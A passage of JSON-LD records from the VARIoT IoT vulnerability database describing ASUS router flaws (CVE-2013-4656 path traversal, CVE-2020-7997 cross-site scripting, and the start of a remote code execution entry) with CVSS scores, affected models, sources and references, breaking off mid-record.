    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201911-1519",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 2.2,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": "eq",
            "trust": 2.2,
            "vendor": "asus",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-n56u",
            "scope": null,
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:asus:rt-n56u_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          }
        ]
      },
      "cve": "CVE-2013-4656",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2013-4656",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2013-4656",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2013-4656",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2013-4656",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2013-4656",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201911-727",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Symlink Traversal vulnerability in ASUS RT-AC66U and RT-N56U due to misconfiguration in the SMB service. ASUS RT-AC66U and RT-N56U Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2013-4656"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          }
        ],
        "trust": 1.62
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2013-4656",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "id": "VAR-201911-1519",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.539042785
      },
      "last_update_date": "2024-11-23T23:01:34.738000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "https://www.asus.com/us/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://www.ise.io/casestudies/exploiting-soho-routers/"
          },
          {
            "trust": 1.6,
            "url": "https://www.ise.io/wp-content/uploads/2017/07/soho_techreport.pdf"
          },
          {
            "trust": 1.6,
            "url": "https://www.ise.io/soho_service_hacks/"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4656"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4656"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          },
          {
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-11-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "date": "2019-11-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          },
          {
            "date": "2019-11-13T15:15:09.963000",
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2019-11-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          },
          {
            "date": "2019-12-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          },
          {
            "date": "2024-11-21T01:56:00.100000",
            "db": "NVD",
            "id": "CVE-2013-4656"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS RT-AC66U and  RT-N56U Path traversal vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2013-006951"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "path traversal",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201911-727"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202001-1689

    Vulnerability from variot - Updated: 2024-11-23 23:01

    ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature. ASUS WRT-AC66U 3 RT Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. ASUS WRT-AC66U is a product of Taiwan ASUS Corporation.

    A cross-site scripting vulnerability exists in ASUS WRT-AC66U. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1689",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "asus",
            "version": "3.0.0.4.372_67"
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": null
          },
          {
            "model": "rt-ac66u",
            "scope": "eq",
            "trust": 0.8,
            "vendor": "asustek computer",
            "version": "rt-ac66u  firmware  3.0.0.4.372_67"
          },
          {
            "model": "wrt-ac66u",
            "scope": null,
            "trust": 0.6,
            "vendor": "asus",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "cve": "CVE-2020-7997",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.6,
                "id": "CVE-2020-7997",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 6.4,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-04914",
                "impactScore": 4.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 6.1,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 2.8,
                "id": "CVE-2020-7997",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 6.1,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2020-7997",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-7997",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2020-7997",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-04914",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202001-1236",
                "trust": 0.6,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1236"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS WRT-AC66U 3 RT 3.0.0.4.372_67 devices allow XSS via the Client Name field to the Parental Control feature. ASUS WRT-AC66U 3 RT Contains a cross-site scripting vulnerability.The information may be obtained and the information may be falsified. ASUS WRT-AC66U is a product of Taiwan ASUS Corporation. \n\r\n\r\nA cross-site scripting vulnerability exists in ASUS WRT-AC66U. The vulnerability stems from the lack of proper validation of client data by web applications. An attacker could use this vulnerability to execute client code",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-7997"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          }
        ],
        "trust": 2.16
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-7997",
            "trust": 3.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1236",
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1236"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "id": "VAR-202001-1689",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          }
        ],
        "trust": 1.35703795
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          }
        ]
      },
      "last_update_date": "2024-11-23T23:01:32.365000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "RTAC66U",
            "trust": 0.8,
            "url": "https://www.asus.com/Networking/RTAC66U/"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.0
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.0,
            "url": "https://gist.github.com/adeshkolte/983bcadd82cc1fd60333098eb646ef68"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-7997"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1236"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1236"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          },
          {
            "date": "2020-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "date": "2020-01-28T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202001-1236"
          },
          {
            "date": "2020-01-28T05:15:11.447000",
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-02-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-04914"
          },
          {
            "date": "2020-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          },
          {
            "date": "2021-01-05T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202001-1236"
          },
          {
            "date": "2024-11-21T05:38:10.003000",
            "db": "NVD",
            "id": "CVE-2020-7997"
          }
        ]
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "ASUS\u00a0WRT-AC66U\u00a03\u00a0RT\u00a0 Vulnerable to cross-site scripting",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-001472"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202001-1236"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201804-1564

    Vulnerability from variot - Updated: 2024-11-23 22:41

    ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, and RT-N12 D1 routers with firmware before 3.0.0.4.380.8228; RT-AC52U B1, RT-AC1200 and RT-N600 routers with firmware before 3.0.0.4.380.10446; RT-AC55U and RT-AC55UHP routers with firmware before 3.0.0.4.382.50276; RT-AC86U and RT-AC2900 routers with firmware before 3.0.0.4.384.20648; and possibly other RT-series routers allow remote attackers to execute arbitrary code via unspecified vectors. plural ASUS Router product firmware contains a vulnerability related to input validation.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUSRT-AC51U and others are router products of ASUS. There are security vulnerabilities in several ASUS products. A remote attacker can exploit this vulnerability to execute arbitrary code. The following products are affected: ASUS RT-AC51U, RT-AC58U, RT-AC66U, RT-AC1750, RT-ACRH13, RT-N12 D1 (using firmware earlier than 3.0.0.4.380.8228); RT-AC52U B1, RT-AC1200 , RT-N600 (use the previous version 3.0.0.4.380.10446 firmware); RT-AC55U, RT-AC55UHP (use the previous version 3.0.0.4.382.50276 firmware); RT-AC86U, RT-AC2900 (use the previous version 3.0. version 0.4.384.20648 firmware)

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201804-1564",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rt-ac1200",
